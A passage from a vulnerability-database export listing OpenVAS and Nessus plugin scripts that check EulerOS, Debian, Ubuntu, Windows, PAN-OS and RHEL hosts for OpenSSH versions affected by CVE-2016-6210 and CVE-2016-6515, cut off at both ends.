See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2017.1190\");\n script_version(\"2020-01-23T10:57:18+0000\");\n script_cve_id(\"CVE-2016-6210\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 10:57:18 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 10:57:18 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for openssh (EulerOS-SA-2017-1190)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP2\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2017-1190\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1190\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'openssh' package(s) announced via the EulerOS-SA-2017-1190 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A covert timing channel flaw was found in the way OpenSSH handled authentication of non-existent users. A remote unauthenticated attacker could possibly use this flaw to determine valid user names by measuring the timing of server responses. 
(CVE-2016-6210)\");\n\n script_tag(name:\"affected\", value:\"'openssh' package(s) on Huawei EulerOS V2.0SP2.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP2\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh\", rpm:\"openssh~6.6.1p1~28.h13\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-askpass\", rpm:\"openssh-askpass~6.6.1p1~28.h13\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-clients\", rpm:\"openssh-clients~6.6.1p1~28.h13\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-keycat\", rpm:\"openssh-keycat~6.6.1p1~28.h13\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-server\", rpm:\"openssh-server~6.6.1p1~28.h13\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:35:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6210"], "description": "Eddie Harari reported that the OpenSSH\nSSH daemon allows user enumeration through timing differences when trying to\nauthenticate users. When sshd tries to authenticate a non-existing user, it will\npick up a fixed fake password structure with a hash based on the Blowfish\nalgorithm. 
If real users passwords are hashed using SHA256/SHA512, then\na remote attacker can take advantage of this flaw by sending large\npasswords, receiving shorter response times from the server for\nnon-existing users.", "modified": "2019-03-18T00:00:00", "published": "2016-08-02T00:00:00", "id": "OPENVAS:1361412562310703626", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703626", "type": "openvas", "title": "Debian Security Advisory DSA 3626-1 (openssh - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3626.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Auto-generated from advisory DSA 3626-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703626\");\n script_version(\"$Revision: 14275 $\");\n script_cve_id(\"CVE-2016-6210\");\n script_name(\"Debian Security Advisory DSA 3626-1 (openssh - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-08-02 10:55:52 +0530 (Tue, 02 Aug 2016)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2016/dsa-3626.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n script_tag(name:\"affected\", value:\"openssh on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (jessie),\nthis problem has been fixed in version 1:6.7p1-5+deb8u3.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1:7.2p2-6.\n\nWe recommend that you upgrade your openssh packages.\");\n script_tag(name:\"summary\", value:\"Eddie Harari reported that the OpenSSH\nSSH daemon allows user enumeration through timing differences when trying to\nauthenticate users. 
When sshd tries to authenticate a non-existing user, it will\npick up a fixed fake password structure with a hash based on the Blowfish\nalgorithm. If real users passwords are hashed using SHA256/SHA512, then\na remote attacker can take advantage of this flaw by sending large\npasswords, receiving shorter response times from the server for\nnon-existing users.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software\nversion using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"openssh-client\", ver:\"1:6.7p1-5+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"openssh-server\", ver:\"1:6.7p1-5+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"openssh-sftp-server\", ver:\"1:6.7p1-5+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ssh\", ver:\"1:6.7p1-5+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ssh-askpass-gnome\", ver:\"1:6.7p1-5+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ssh-krb5\", ver:\"1:6.7p1-5+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:35:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6515", "CVE-2016-6210"], "description": "This host is installed with openssh and\n is prone to denial of service and user enumeration vulnerabilities.", "modified": "2019-05-21T00:00:00", "published": "2016-08-18T00:00:00", "id": "OPENVAS:1361412562310809121", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809121", "type": "openvas", "title": "OpenSSH Denial of Service And User Enumeration Vulnerabilities (Windows)", 
"sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# OpenSSH Denial of Service And User Enumeration Vulnerabilities (Windows)\n#\n# Authors:\n# Tushar Khelge <ktushar@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:openbsd:openssh\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809121\");\n script_version(\"2019-05-21T12:48:06+0000\");\n script_cve_id(\"CVE-2016-6515\", \"CVE-2016-6210\");\n script_bugtraq_id(92212);\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-21 12:48:06 +0000 (Tue, 21 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-08-18 10:29:27 +0530 (Thu, 18 Aug 2016)\");\n script_name(\"OpenSSH Denial of Service And User Enumeration Vulnerabilities (Windows)\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Denial of Service\");\n script_dependencies(\"gb_openssh_consolidation.nasl\", \"os_detection.nasl\");\n 
script_mandatory_keys(\"openssh/detected\", \"Host/runs_windows\");\n\n script_xref(name:\"URL\", value:\"http://www.openssh.com/txt/release-7.3\");\n script_xref(name:\"URL\", value:\"http://seclists.org/fulldisclosure/2016/Jul/51\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/CVE-2016-6210\");\n script_xref(name:\"URL\", value:\"http://openwall.com/lists/oss-security/2016/08/01/2\");\n\n script_tag(name:\"summary\", value:\"This host is installed with openssh and\n is prone to denial of service and user enumeration vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist:\n\n - The auth_password function in 'auth-passwd.c' does not limit password\n lengths for password authentication (CVE-2016-6515).\n\n - When SHA256 or SHA512 is used for user password hashing, sshd in OpenSSH\n hashes a static password with BLOWFISH when the username does not exist,\n and computing a SHA256/SHA512 hash takes much longer than a BLOWFISH hash,\n so response timing reveals whether a user exists (CVE-2016-6210).\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue allows\n remote attackers to cause a denial of service (crypt CPU consumption) and\n to enumerate users by leveraging the timing difference between responses\n when a large password is provided.\");\n\n script_tag(name:\"affected\", value:\"OpenSSH versions before 7.3 on Windows\");\n\n script_tag(name:\"solution\", value:\"Upgrade to OpenSSH version 7.3 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(isnull(port = get_app_port(cpe:CPE)))\n exit(0);\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:port, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = 
infos[\"location\"];\n\nif(version_is_less(version:vers, test_version:\"7.3\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"7.3\", install_path:path);\n security_message(port:port, data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-07-25T12:17:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9149", "CVE-2016-6210"], "description": "Palo Alto Networks makes use of the OpenSSH tool. CVE-2016-6210 was recently confirmed to be applicable to the version in use by PAN-OS.", "modified": "2019-07-24T00:00:00", "published": "2016-11-21T00:00:00", "id": "OPENVAS:1361412562310140073", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140073", "type": "openvas", "title": "Palo Alto PAN-OS OpenSSH Vulnerability (PAN-SA-2016-0036)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Palo Alto PAN-OS OpenSSH Vulnerability (PAN-SA-2016-0036)\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/o:paloaltonetworks:pan-os';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140073\");\n script_cve_id(\"CVE-2016-9149\");\n script_tag(name:\"cvss_base\", value:\"4.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:N/I:P/A:N\");\n script_version(\"2019-07-24T08:39:52+0000\");\n\n script_name(\"Palo Alto PAN-OS OpenSSH Vulnerability (PAN-SA-2016-0036)\");\n\n script_xref(name:\"URL\", value:\"https://securityadvisories.paloaltonetworks.com/Home/Detail/69\");\n\n script_tag(name:\"summary\", value:\"Palo Alto Networks makes use of the OpenSSH tool. CVE-2016-6210 was recently confirmed to be applicable to the version in use by PAN-OS.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"solution\", value:\"Update to PAN-OS 6.0.15 or later (this also applies to PAN-OS 5.0.x and 5.1.x), PAN-OS 6.1.15 or later, PAN-OS 7.0.11 or later, or PAN-OS 7.1.6 or later\");\n\n script_tag(name:\"affected\", value:\"PAN-OS 5.0.X and earlier, PAN-OS 5.1.X and earlier, PAN-OS 6.0.14 and earlier, PAN-OS 6.1.14 and earlier, PAN-OS 7.0.10 and earlier, PAN-OS 7.1.5 and earlier\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_tag(name:\"last_modification\", value:\"2019-07-24 08:39:52 +0000 (Wed, 24 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-11-21 11:15:25 +0100 (Mon, 21 Nov 2016)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Palo Alto PAN-OS Local Security Checks\");\n script_copyright(\"This script is Copyright (C) 2016 Greenbone Networks GmbH\");\n 
script_dependencies(\"gb_palo_alto_panOS_version.nasl\");\n script_mandatory_keys(\"palo_alto_pan_os/version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! version = get_app_version( cpe:CPE, nofork:TRUE ) ) exit( 0 );\n\nmodel = get_kb_item( \"palo_alto_pan_os/model\" );\n\nif( version =~ \"^5\\.0\" )\n fix = '6.0.15';\nelse if( version =~ \"^5\\.1\" )\n fix = '6.0.15';\nelse if( version =~ \"^6\\.0\" )\n fix = '6.0.15';\nelse if( version =~ \"^6\\.1\" )\n fix = '6.1.15';\nelse if( version =~ \"^7\\.0\" )\n fix = '7.0.11';\nelse if( version =~ \"^7\\.1\" )\n fix = '7.1.6';\n\nif( ! fix ) exit( 0 );\n\nif( version_is_less( version:version, test_version:fix ) )\n{\n report = 'Installed version: ' + version + '\\n' +\n 'Fixed version: ' + fix;\n\n if( model )\n report += '\\nModel: ' + model;\n\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:34:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6515", "CVE-2016-6210"], "description": "The remote host is missing an update for the 'openssh' package(s) announced via the referenced advisory.", "modified": "2019-03-13T00:00:00", "published": "2016-08-16T00:00:00", "id": "OPENVAS:1361412562310842862", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842862", "type": "openvas", "title": "Ubuntu Update for openssh USN-3061-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for openssh USN-3061-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be 
useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842862\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-08-16 05:43:08 +0200 (Tue, 16 Aug 2016)\");\n script_cve_id(\"CVE-2016-6210\", \"CVE-2016-6515\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for openssh USN-3061-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'openssh'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Eddie Harari discovered that OpenSSH\n incorrectly handled password hashing when authenticating non-existing users.\n A remote attacker could perform a timing attack and enumerate valid users.\n (CVE-2016-6210)\n\nTomas Kuthan, Andres Rojas, and Javier Nieto discovered that OpenSSH did\nnot limit password lengths. 
A remote attacker could use this issue to cause\nOpenSSH to consume resources, leading to a denial of service.\n(CVE-2016-6515)\");\n script_tag(name:\"affected\", value:\"openssh on Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS,\n Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3061-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3061-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|12\\.04 LTS|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"openssh-server\", ver:\"1:6.6p1-2ubuntu2.8\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"openssh-server\", ver:\"1:5.9p1-5ubuntu1.10\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"openssh-server\", ver:\"1:7.2p2-4ubuntu2.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "nessus": [{"lastseen": "2021-01-01T05:08:28", "description": "An update for openssh is now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product 
Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nOpenSSH is an SSH protocol implementation supported by a number of\nLinux, UNIX, and similar operating systems. It includes the core files\nnecessary for both the OpenSSH client and server.\n\nSecurity Fix(es) :\n\n* A covert timing channel flaw was found in the way OpenSSH handled\nauthentication of non-existent users. A remote unauthenticated\nattacker could possibly use this flaw to determine valid user names by\nmeasuring the timing of server responses. (CVE-2016-6210)", "edition": 26, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-09-01T00:00:00", "title": "RHEL 6 : openssh (RHSA-2017:2563)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6210"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:openssh", "p-cpe:/a:redhat:enterprise_linux:openssh-askpass", "p-cpe:/a:redhat:enterprise_linux:openssh-debuginfo", "p-cpe:/a:redhat:enterprise_linux:openssh-ldap", "p-cpe:/a:redhat:enterprise_linux:openssh-clients", "p-cpe:/a:redhat:enterprise_linux:openssh-server", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:pam_ssh_agent_auth"], "id": "REDHAT-RHSA-2017-2563.NASL", "href": "https://www.tenable.com/plugins/nessus/102909", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:2563. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(102909);\n script_version(\"3.8\");\n script_cvs_date(\"Date: 2019/10/24 15:35:43\");\n\n script_cve_id(\"CVE-2016-6210\");\n script_xref(name:\"RHSA\", value:\"2017:2563\");\n\n script_name(english:\"RHEL 6 : openssh (RHSA-2017:2563)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for openssh is now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nOpenSSH is an SSH protocol implementation supported by a number of\nLinux, UNIX, and similar operating systems. It includes the core files\nnecessary for both the OpenSSH client and server.\n\nSecurity Fix(es) :\n\n* A covert timing channel flaw was found in the way OpenSSH handled\nauthentication of non-existent users. A remote unauthenticated\nattacker could possibly use this flaw to determine valid user names by\nmeasuring the timing of server responses. 
(CVE-2016-6210)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2017:2563\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-6210\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssh-askpass\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssh-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssh-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssh-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssh-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:pam_ssh_agent_auth\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/02/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n 
script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2017:2563\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openssh-5.3p1-123.el6_9\")) flag++;\n if (rpm_check(release:\"RHEL6\", 
